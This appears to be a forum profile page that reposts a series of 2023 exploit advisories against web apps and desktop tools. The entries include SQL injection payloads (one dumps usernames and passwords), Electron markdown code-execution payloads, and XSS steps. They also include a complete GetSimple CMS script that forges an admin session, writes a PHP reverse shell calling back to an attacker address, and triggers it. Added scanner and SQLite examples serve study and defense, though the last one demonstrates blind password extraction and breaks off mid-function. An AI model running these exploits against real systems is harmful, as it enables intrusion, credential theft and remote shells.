
Everything posted by HireHackking
-
Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Title: Affiliate Me Version 5.0.1 - SQL Injection
[#] Exploit Date: May 16, 2023.
[#] CVSS 3.1: 6.4 (Medium)
[#] CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
[#] Tactic: Initial Access (TA0001)
[#] Technique: Exploit Public-Facing Application (T1190)
[#] Application Name: Affiliate Me
[#] Application Version: 5.0.1
[#] Vendor: https://www.powerstonegh.com/
[#] Author: h4ck3r - Faisal Albuloushi
[#] Contact: SQL@hotmail.co.uk
[#] Blog: https://www.0wl.tech
[#] Exploit: [path]/admin.php?show=reply&id=[Injected Query]
[#] Example: [path]/admin.php?show=reply&id=-999' Union Select 1,2,3,4,5,6,7,8,9,concat(ID,0x3a,USERNAME,0x3a,PASSWORD),11,12,13,14,15,16 from users-- -
[#] Notes:
- The id parameter is placed into the query as-is; the example UNION matches the original 16-column SELECT and reflects column 10, so ID:USERNAME:PASSWORD triples from the users table are rendered in the reply page.
- A normal admin can exploit this vulnerability to escalate his privileges to super admin.
-
Smart School v1.0 - SQL Injection
# Exploit Title: Smart School v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/smart-school-school-management-system/19426018
# Demo Site: https://demo.smart-school.in
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /course/filterRecords/ HTTP/1.1
Host: localhost
Cookie: ci_session=dd1bqn8ulsiog4vf7fle5hd4k4fklvve
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 136
Origin: https://localhost
Referer: https://localhost/course/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

searchdata%5B0%5D%5Btitle%5D=category&searchdata%5B0%5D%5Bsearchfield%5D=online_courses.category_id&searchdata%5B0%5D%5Bsearchvalue%5D=1

### Parameter & Payloads ###

Parameter: searchdata[0][searchfield] (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchdata[0][title]=category&searchdata[0][searchfield]=online_courses.category_id AND (SELECT 7313 FROM (SELECT(SLEEP(5)))mvaR)-- hAHp&searchdata[0][searchvalue]=1
-
Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Exploit Title: Yank Note v3.52.1 (Electron) - Arbitrary Code Execution
# Date: 2023-04-27
# Exploit Author: 8bitsec
# CVE: CVE-2023-31874
# Vendor Homepage: yank-note.com
# Software Link: https://github.com/purocean/yn
# Version: 3.52.1
# Tested on: [Ubuntu 22.04 | Mac OS 13]

Release Date:
2023-04-27

Product & Service Introduction:
A Hackable Markdown Editor for Programmers. Version control, AI completion, mind map, documents encryption, code snippet running, integrated terminal, chart embedding, HTML applets, Reveal.js, plug-in, and macro replacement

Technical Details & Description:
A vulnerability was discovered in Yank Note v3.52.1 that allows a user to execute arbitrary code by opening a specially crafted file. Raw HTML inside the markdown is rendered, and an event handler nested in an iframe srcdoc can reach Node's child_process through parent.parent.nodeRequire, so opening the file is enough to run a command on the host.

Proof of Concept (PoC):

Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following payload.

Mac:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());>')>">

Ubuntu:
<iframe srcdoc="<img src=x onerror=alert(parent.parent.nodeRequire('child_process').execSync('gnome-calculator').toString());>')>">

Opening the file in Yank Note will auto execute the Calculator application.
-
Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
# Exploit Title: Gin Markdown Editor v0.7.4 (Electron) - Arbitrary Code Execution
# Date: 2023-04-24
# Exploit Author: 8bitsec
# CVE: CVE-2023-31873
# Vendor Homepage: https://github.com/mariuskueng/gin
# Software Link: https://github.com/mariuskueng/gin
# Version: 0.7.4
# Tested on: [Mac OS 13]

Release Date:
2023-04-24

Product & Service Introduction:
Javascript Markdown editor for Mac

Technical Details & Description:
A vulnerability was discovered in Gin markdown editor v0.7.4 that allows a user to execute arbitrary code by opening a specially crafted file. The renderer exposes Node's require to page content, so an onerror handler in raw HTML inside the markdown can call child_process directly.

Proof of Concept (PoC):

Arbitrary code execution:
Create a markdown file (.md) in any text editor and write the following payload:

<video><source onerror="alert(require('child_process').execSync('/System/Applications/Calculator.app/Contents/MacOS/Calculator').toString());">

Opening the file in Gin will auto execute the Calculator application.
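Both Electron PoCs above work the same way: raw HTML inside the markdown reaches a renderer where an event handler can call into Node. The scanner below is an added example, not code from Yank Note, Gin, or either advisory. It walks the raw HTML of a markdown document and reports the constructs the two payloads rely on: script-capable tags, on* event handlers, script URL schemes, and anything hidden inside an iframe srcdoc (which is a whole nested document and is parsed recursively). The three sample documents are constructed for this example and only mirror the shape of the payloads, with a harmless command.

```python
# Added example: flag active HTML content in markdown before an Electron renderer sees it.
from html.parser import HTMLParser
from typing import List, Tuple

# Tags that execute or embed script, and URL schemes that run script when followed.
SCRIPT_TAGS = {"script", "iframe", "object", "embed"}
SCRIPT_URL_SCHEMES = ("javascript:", "data:", "vbscript:")


class ActiveContentScanner(HTMLParser):
    """Collect every tag/attribute that can execute script; recurse into srcdoc documents."""

    def __init__(self, depth: int = 0):
        super().__init__(convert_charrefs=True)
        self.depth = depth  # nesting level, so srcdoc findings are visibly indented
        self.findings: List[Tuple[str, str]] = []

    # HTMLParser also routes self-closing tags (<img .../>) through handle_starttag.
    def handle_starttag(self, tag, attrs):
        where = "  " * self.depth
        if tag in SCRIPT_TAGS:
            self.findings.append((f"{where}{tag}", "tag can execute or embed script"))
        for name, value in attrs:
            lname = name.lower()
            if lname.startswith("on"):
                self.findings.append((f"{where}{tag}@{lname}", "event handler attribute"))
            elif lname in ("href", "src", "xlink:href") and value \
                    and value.strip().lower().startswith(SCRIPT_URL_SCHEMES):
                self.findings.append((f"{where}{tag}@{lname}", "script URL scheme"))
            elif lname == "srcdoc" and value:
                # The Yank Note payload hides <img onerror> inside srcdoc: parse it as a document.
                inner = ActiveContentScanner(self.depth + 1)
                inner.feed(value)
                inner.close()
                self.findings.extend(inner.findings)


def scan_markdown(text: str) -> List[Tuple[str, str]]:
    """Return (location, reason) pairs for raw HTML in a markdown document; [] means clean."""
    scanner = ActiveContentScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


# Constructed samples (not the advisories' files): same structure as the PoCs, harmless command.
SAMPLE_YANK_STYLE = (
    "# notes\n\n"
    "<iframe srcdoc=\"<img src=x onerror=alert(parent.parent.nodeRequire('child_process')"
    ".execSync('id').toString());>\">\n"
)
SAMPLE_GIN_STYLE = (
    "<video><source onerror=\"alert(require('child_process').execSync('id').toString());\"></video>\n"
)
SAMPLE_BENIGN = "# title\n\nSome *markdown* with <b>bold</b> and a <a href=\"https://example.com\">link</a>.\n"


if __name__ == "__main__":
    for label, doc in (("yank-style", SAMPLE_YANK_STYLE), ("gin-style", SAMPLE_GIN_STYLE),
                       ("benign", SAMPLE_BENIGN)):
        print(label, "->", scan_markdown(doc) or "clean")
```

The scanner is a triage tool, not a sanitizer: a markdown editor that renders raw HTML in a Node-enabled renderer has to either strip active content before rendering or keep Node out of the renderer (nodeIntegration off, contextIsolation on, no nodeRequire bridge); the findings here tell you which documents exercise that boundary.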
-
LeadPro CRM v1.0 - SQL Injection
# Exploit Title: LeadPro CRM v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/leadifly-lead-call-center-crm/43485578
# Demo Site: https://demo.leadifly.in
# Tested on: Kali Linux
# CVE: N/A

### Request ###

GET /api/v1/products?fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name%20lk%20%22%25aa%25%22&order=id%20desc&offset=0&limit=10 HTTP/1.1
Host: localhost
Cookie: XSRF-TOKEN=eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0%3D; leadifly_session=eyJpdiI6InYyUzVNWkVhVHVrODI2ZTl0a21SNmc9PSIsInZhbHVlIjoiSzNjeDVxYUJRbHZEOVd3Z2I3N2pWa1VrbHdTUUNNSmF6blFEN2E4Q3l5RjJ5WnUxbTdyaFJJN3dCUWhZRklzd3B2OWN5bkZJTnR0RndndGxyNjdRSUp6b2NBV1JhSHFWb211SllzajFkb3JCQmtqSzJEeU9ENDZDWW1jdnF0VHEiLCJtYWMiOiI1YjI1YTdlNjhkMDg4NTQyOGI0ODI0ODI5ZjliNzE0OWExNGUxMWVjYmY2MjM2Y2YyMmNkNjMzYmMzODYwNzE1IiwidGFnIjoiIn0%3D
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
X-Csrf-Token: kMwvghrsJyPwJ1LGTXnMgMQAtQGA33DzzMYdes6V
Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwczovL2RlbW8ubGVhZGlmbHkuaW4vYXBpL3YxL2F1dGgvbG9naW4iLCJpYXQiOjE2ODQzMTk3ODAsImV4cCI6MTY4NDM0MTY4MCwibmJmIjoxNjg0MzE5NzgwLCJqdGkiOiJleGJDV2ZmdWhiWTIzRlNqIiwic3ViIjoiMSIsInBydiI6IjIzYmQ1Yzg5NDlmNjAwYWRiMzllNzAxYzQwMDg3MmRiN2E1OTc2ZjcifQ.0GcDjE6Q3GYg8PUeJQAXtMET6yAjGh1Bj9joRMoqZo8
X-Xsrf-Token: eyJpdiI6Ind6QkVPeUZzKzI3SWlqSnhjQksyK1E9PSIsInZhbHVlIjoiNU1FQzBRR3NJaFFMNXVrOFp6Y3puQjdNT3ZKcSsyYzc0Nllkc1ovbkMzRnJueDZWV1lnZzJ2RmRaZFRobmRRSmUzVFpDS3dhNVhVRS84UXQrd1FrWkFIclR4Z0d3UDk2YjdFS0MxN25aVG5sY2loQjFYVkhrRXdOV2lWM0s4Um4iLCJtYWMiOiI2MjBiMTEwYTY5MWE3YjYyZTRjYmU5MWU0ZTcwZjRmNGI5ZjUxNjZjNjFmMjc1ZDAwOTE1ODM3NzA5YzZkMzQzIiwidGFnIjoiIn0=
Referer: https://localhost/admin/product
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

### Parameter & Payloads ###

Parameter: filters (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: fields=id,xid,name,price,product_type,tax_rate,tax_label,logo,logo_url&filters=name lk "%aa%") AND (SELECT 6593 FROM (SELECT(SLEEP(5)))qBNH) AND (8549=8549&order=id desc&offset=0&limit=10
-
Stackposts Social Marketing Tool v1.0 - SQL Injection
# Exploit Title: Stackposts Social Marketing Tool v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/stackposts-social-marketing-tool/21747459
# Demo Site: https://demo.stackposts.com
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /spmo/auth/login HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: https://localhost/spmo/
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 104
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1*

### Parameter & Payloads ###

Parameter: username (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: csrf=eb39b2f794107f2987044745270dc59d&password=1&username=1') AND (SELECT 9595 FROM (SELECT(SLEEP(5)))YRMM) AND ('gaNg'='gaNg
-
GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
# Exploit Title: GetSimple CMS v3.3.16 - Remote Code Execution (RCE)
# Date: 18/5/2023
# Exploit Author : Youssef Muhammad
# Vendor: Get-simple
# Software Link:
# Version app: 3.3.16
# Tested on: linux
# CVE: CVE-2022-41544

import sys
import hashlib
import re
import requests
from xml.etree import ElementTree

purple = "\033[0;35m"
reset = "\033[0m"
yellow = "\033[93m"
blue = "\033[34m"
red = "\033[0;31m"


def print_the_banner():
    # The original ASCII-art banner did not survive extraction; print the CVE id instead.
    print(purple + "CVE-2022-41544 - GetSimple CMS <= 3.3.16 authenticated RCE" + reset)


def _version_tuple(version):
    # Compare versions numerically: a plain string comparison orders "3.3.9" after "3.3.16".
    try:
        return tuple(int(part) for part in version.split("."))
    except ValueError:
        return None


def get_version(target, path):
    # The admin login page references jquery.getsimple.js?v=<version>, which leaks the CMS version.
    r = requests.get(f"http://{target}{path}admin/index.php")
    match = re.search(r"jquery\.getsimple\.js\?v=(.*?)\"", r.text)
    if match:
        version = match.group(1)
        parsed = _version_tuple(version)
        if parsed is not None and parsed <= (3, 3, 16):
            print(red + f"[+] the version {version} is vulnerable to CVE-2022-41544" + reset)
        else:
            print("This is not vulnerable to this CVE")
        return version
    return None


def api_leak(target, path):
    # data/other/authorization.xml is world-readable on vulnerable installs and contains the API key.
    r = requests.get(f"http://{target}{path}data/other/authorization.xml")
    if r.ok:
        tree = ElementTree.fromstring(r.content)
        apikey = tree[0].text
        print(f"[+] apikey obtained {apikey}")
        return apikey
    return None


def set_cookies(username, version, apikey):
    # With the API key known, the admin session cookie name and value can be forged offline.
    cookie_name = hashlib.sha1(f"getsimple_cookie_{version.replace('.', '')}{apikey}".encode()).hexdigest()
    cookie_value = hashlib.sha1(f"{username}{apikey}".encode()).hexdigest()
    cookies = f"GS_ADMIN_USERNAME={username};{cookie_name}={cookie_value}"
    headers = {
        'Content-Type': 'application/x-www-form-urlencoded',
        'Cookie': cookies
    }
    return headers


def get_csrf_token(target, path, headers):
    r = requests.get(f"http://{target}{path}admin/theme-edit.php", headers=headers)
    m = re.search('nonce" type="hidden" value="(.*?)"', r.text)
    if m:
        print("[+] csrf token obtained")
        return m.group(1)
    return None


def upload_shell(target, path, headers, nonce, shell_content):
    upload_url = f"http://{target}{path}admin/theme-edit.php?updated=true"
    payload = {
        'content': shell_content,
        'edited_file': '../shell.php',  # path traversal out of the theme directory into the web root
        'nonce': nonce,
        'submitsave': 1
    }
    try:
        response = requests.post(upload_url, headers=headers, data=payload)
        if response.status_code == 200:
            print("[+] Shell uploaded successfully!")
        else:
            print("(-) Shell upload failed!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while uploading the shell:", e)


def shell_trigger(target, path):
    url = f"http://{target}{path}shell.php"  # path already ends with '/'
    try:
        response = requests.get(url)
        if response.status_code == 200:
            print("[+] Webshell triggered successfully!")
        else:
            print("(-) Failed to visit the page!")
    except requests.exceptions.RequestException as e:
        print("(-) An error occurred while visiting the page:", e)


def main():
    if len(sys.argv) != 5:
        print("Usage: python3 CVE-2022-41544.py <target> <path> <ip:port> <username>")
        return
    target = sys.argv[1]
    path = sys.argv[2]
    if not path.endswith('/'):
        path += '/'
    ip, port = sys.argv[3].split(':')
    username = sys.argv[4]

    # PHP reverse shell that connects back to <ip:port> from the argument list.
    shell_content = f"""<?php
$ip = '{ip}';
$port = {port};
$sock = fsockopen($ip, $port);
$proc = proc_open('/bin/sh', array(0 => $sock, 1 => $sock, 2 => $sock), $pipes);
"""

    version = get_version(target, path)
    if not version:
        print("(-) could not get version")
        return
    apikey = api_leak(target, path)
    if not apikey:
        print("(-) could not get apikey")
        return
    headers = set_cookies(username, version, apikey)
    nonce = get_csrf_token(target, path, headers)
    if not nonce:
        print("(-) could not get nonce")
        return
    upload_shell(target, path, headers, nonce, shell_content)
    shell_trigger(target, path)


if __name__ == '__main__':
    print_the_banner()
    main()
-
Quicklancer v1.0 - SQL Injection
# Exploit Title: Quicklancer v1.0 - SQL Injection
# Date: 2023-05-17
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/quicklancer-freelance-marketplace-php-script/39087135
# Demo Site: https://quicklancer.bylancer.com
# Tested on: Kali Linux
# CVE: N/A

### Request ###

POST /php/user-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
x-requested-with: XMLHttpRequest
Referer: https://localhost
Cookie: sec_session_id=12bcd985abfc52d90489a6b5fd8219b2; quickjob_view_counted=31; Quick_lang=arabic
Content-Length: 93
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

action=searchStateCountry&dataString=deneme

### Parameter & Payloads ###

Parameter: dataString (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: action=searchStateCountry&dataString=deneme' AND (SELECT 8068 FROM (SELECT(SLEEP(5)))qUdx) AND 'nbTo'='nbTo
-
Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Exploit Title: Bludit CMS v3.14.1 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 2023-04-15
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: https://www.bludit.com/
# Software Link: https://github.com/bludit/bludit/releases/tag/3.14.1
# Version: 3.14.1
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31698

SVG Payload
-------------
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>

Save this SVG file as xss.svg.

Steps to Reproduce:
1. Log in to the admin panel.
2. Go to Settings and open the logo section.
3. Upload xss.svg; the request will look like this:

POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998
Referer: http://127.0.0.1/bludit/admin/settings
Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
Content-Length: 651

-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="tokenCSRF"

626c201693546f472cdfc11bed0938aab8c6e480
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
Content-Type: image/svg+xml

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
   <script type="text/javascript">
      alert(document.domain);
   </script>
</svg>
-----------------------------15560729415644048492005010998--

4. Open the link of the uploaded logo image directly. The XSS pop-up appears, because the SVG is served from the site's origin and navigated to as a document, where its script element runs.
-
FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
# Exploit Title: FusionInvoice 2023-1.0 - Stored XSS (Cross-Site Scripting)
# Date: 2023-05-24
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://www.squarepiginteractive.com
# Software Link: https://www.fusioninvoice.com/store
# Version: 2023-1.0
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 113.0.1, Microsoft Edge 113.0.1774.50)
# CVE: CVE-2023-25439

Description:
A stored cross-site scripting (XSS) vulnerability in FusionInvoice 2023-1.0 (from Sqware Pig, LLC) allows an attacker to execute arbitrary web scripts or HTML. Persistent JavaScript injected into the title and/or description while creating a task, expense or project (and possibly other objects) is triggered once the page loads.

Steps to reproduce:
- Click on "Expenses" or "Tasks" and add (or edit an existing) one,
- Insert a payload PoC inside a field, for example "Phone number" (or "Description"),
- Click on 'Save'.

Visiting the website dashboard, as well as the customer or project summary page, executes the JavaScript.

PoC Screenshots:
https://imagebin.ca/v/7FOZfztkDs3I
-
ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
# Exploit Title: ChurchCRM v4.5.4 - Reflected XSS via Image (Authenticated)
# Date: 2023-04-17
# Exploit Author: Rahad Chowdhury
# Vendor Homepage: http://churchcrm.io/
# Software Link: https://github.com/ChurchCRM/CRM/releases/tag/4.5.4
# Version: 4.5.4
# Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53
# CVE: CVE-2023-31699

Steps to Reproduce:
1. Log in to the admin panel.
2. Open the "Admin" menu and click "CSV Import"; the CSV file uploader appears.
3. Insert an XSS payload into a JPG file's metadata (with exiftool, or via the image's properties dialog) and upload that JPG through the importer.
4. The XSS pop-up appears: the metadata is reflected into the page without encoding.
-
MobileTrans 4.0.11 - Weak Service Privilege Escalation
# Exploit Title: MobileTrans 4.0.11 - Weak Service Privilege Escalation
# Date: 20 May 2023
# Exploit Author: Thurein Soe
# Vendor Homepage: https://mobiletrans.wondershare.com/
# Software Link: https://mega.nz/file/0Et0ybRS#l69LRlvwrwmqDfPGKl_HaJ5LmbeKJu_wH0xYKD8nSVg
# Version: MobileTrans version 4.0.11
# Tested on: Window 10 (Version 10.0.19045.2965)
# CVE : CVE-2023-31748

Vulnerability Description:

MobileTrans is a mobile-to-mobile file transfer application. MobileTrans version 4.0.11 suffers from a weak service permission vulnerability that allows a normal Windows user to elevate to local administrator. Installing MobileTrans 4.0.11 registers a service named "ElevationService" that runs as LocalSystem. The cacls output below shows Everyone:(ID)F on ElevationService.exe, so any local user can overwrite the service binary, and the replacement executes with SYSTEM privileges the next time the service starts (the service is AUTO_START, so at the latest on reboot). Effectively, the local user can elevate to local admin by modifying the service or replacing the affected executable.

C:\Users\HninKayThayar\Desktop>sc qc ElevationService
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: ElevationService
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wondershare Driver Install Service help
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\HninKayThayar\Desktop>cacls "C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe"
C:\Program Files (x86)\Wondershare\MobileTrans\ElevationService.exe Everyone:(ID)F
                                                                    NT AUTHORITY\SYSTEM:(ID)F
                                                                    BUILTIN\Administrators:(ID)F
                                                                    BUILTIN\Users:(ID)R
                                                                    APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(ID)R
                                                                    APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(ID)R
-
CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
# Exploit Title: CiviCRM 5.59.alpha1 - Stored XSS (Cross-Site Scripting)
# Date: 2023-02-02
# Exploit Author: Andrea Intilangelo
# Vendor Homepage: https://civicrm.org
# Software Link: https://civicrm.org/download
# Version: 5.59.alpha1, 5.58.0 (and earlier), 5.57.3 (and earlier)
# Tested on: Latest Version of Desktop Web Browsers (ATTOW: Firefox 109.0.1, Microsoft Edge 109.0.1518.70)
# CVE: CVE-2023-25440

Vendor Security Advisory: CIVI-SA-2023-05

Description:
A stored cross-site scripting (XSS) vulnerability in CiviCRM 5.59.alpha1 allows an attacker to execute arbitrary web scripts or HTML. Persistent JavaScript injected through the "Add Contact" function, in the first or last name field while creating a contact, is triggered once the page loads.

Steps to reproduce:
- Quick Add a contact to CiviCRM,
- Insert a payload PoC inside the name field(s),
- Click on 'Add contact'.

When a user visits the dashboard, including the "Recently added" box, the JavaScript is rendered and executed.
-
Service Provider Management System v1.0 - SQL Injection
# Exploit Title: Service Provider Management System v1.0 - SQL Injection
# Date: 2023-05-23
# Exploit Author: Ashik Kunjumon
# Vendor Homepage: https://www.sourcecodester.com/users/lewa
# Software Link: https://www.sourcecodester.com/php/16501/service-provider-management-system-using-php-and-mysql-source-code-free-download.html
# Version: 1.0
# Tested on: Windows/Linux

1. Description:
Service Provider Management System v1.0 allows SQL Injection via the id parameter in /php-spms/?page=services/view&id=2. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit further weaknesses in the underlying database.

Endpoint: /php-spms/?page=services/view&id=2
Vulnerable parameter: id (GET)

2. Proof of Concept:
----------------------
Step 1 - Visit the URL http://localhost/php-spms/?page=services/view&id=2 and append a single quote to the id value; the resulting database error confirms the injection.

Step 2 - Run sqlmap -u "http://localhost/php-spms/?page=services/view&id=2" -p id --dbms=mysql

SQLMap Response:
----------------------
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=services/view&id=1' AND 8462=8462 AND 'jgHw'='jgHw

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: page=services/view&id=1' AND (SELECT 1839 FROM(SELECT COUNT(*),CONCAT(0x7178717171,(SELECT (ELT(1839=1839,1))),0x7176786271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'Cqhk'='Cqhk

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=services/view&id=1' AND (SELECT 1072 FROM (SELECT(SLEEP(5)))lurz) AND 'RQzT'='RQzT
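The three sqlmap payloads above, and the time-based ones in the Smart School, LeadPro, Stackposts and Quicklancer entries earlier on this page, all rest on one defect: the parameter is concatenated into the SQL text, so a quote closes the literal and whatever follows is parsed as SQL. The code below is an added example and is not taken from any of these applications. It reproduces that query shape against an in-memory SQLite database, places the bound-parameter form next to it, and then drives two of the techniques sqlmap reported through the vulnerable function: a boolean-based blind extraction of a password, and a time-based check that needs no visible output difference. SQLite stands in for MySQL, so SLEEP() is registered as a user-defined function and unicode()/substr() take the place of MySQL's ORD()/SUBSTRING(); the services and users rows are constructed for the example.

```python
# Added example: the injected query shape behind the payloads above, against SQLite.
import sqlite3
import time
from typing import Optional, Tuple


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: a services table like the one the view page reads, plus users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE services (id INTEGER PRIMARY KEY, name TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO services VALUES (?, ?)", [(1, "plumbing"), (2, "catering")])
    conn.execute("INSERT INTO users VALUES (1, 'admin', 's3cret')")
    # SQLite has no SLEEP(); register a stand-in so MySQL-style time-based payloads behave the same.
    conn.create_function("SLEEP", 1, lambda seconds: time.sleep(seconds) or 0)
    return conn


def view_service_vulnerable(conn: sqlite3.Connection, service_id: str) -> Optional[Tuple[int, str]]:
    """Mirrors ?page=services/view&id=...: the raw parameter is pasted into the SQL string."""
    sql = f"SELECT id, name FROM services WHERE id = '{service_id}'"
    return conn.execute(sql).fetchone()


def view_service_fixed(conn: sqlite3.Connection, service_id: str) -> Optional[Tuple[int, str]]:
    """Bound parameter: the value travels as data and is never parsed as SQL."""
    return conn.execute("SELECT id, name FROM services WHERE id = ?", (service_id,)).fetchone()


def boolean_oracle(conn: sqlite3.Connection, condition: str) -> bool:
    """Shape of sqlmap's `1' AND 8462=8462 AND 'jgHw'='jgHw`: a row comes back iff condition holds."""
    return view_service_vulnerable(conn, f"1' AND ({condition}) AND 'a'='a") is not None


def extract_password(conn: sqlite3.Connection, username: str, max_len: int = 64) -> str:
    """Recover users.password through the boolean oracle, roughly seven requests per character."""
    secret = f"(SELECT password FROM users WHERE username = '{username}')"
    recovered = ""
    for pos in range(1, max_len + 1):
        if not boolean_oracle(conn, f"length({secret}) >= {pos}"):
            break  # past the end of the string
        low, high = 32, 126  # printable ASCII; binary search on the code point
        while low < high:
            mid = (low + high) // 2
            if boolean_oracle(conn, f"unicode(substr({secret}, {pos}, 1)) > {mid}"):
                low = mid + 1
            else:
                high = mid
        recovered += chr(low)
    return recovered


def time_based_check(conn: sqlite3.Connection, delay: float = 0.3) -> bool:
    """Detection with no output difference at all: the injected SLEEP must add `delay` seconds."""
    def elapsed(param: str) -> float:
        start = time.perf_counter()
        view_service_vulnerable(conn, param)
        return time.perf_counter() - start

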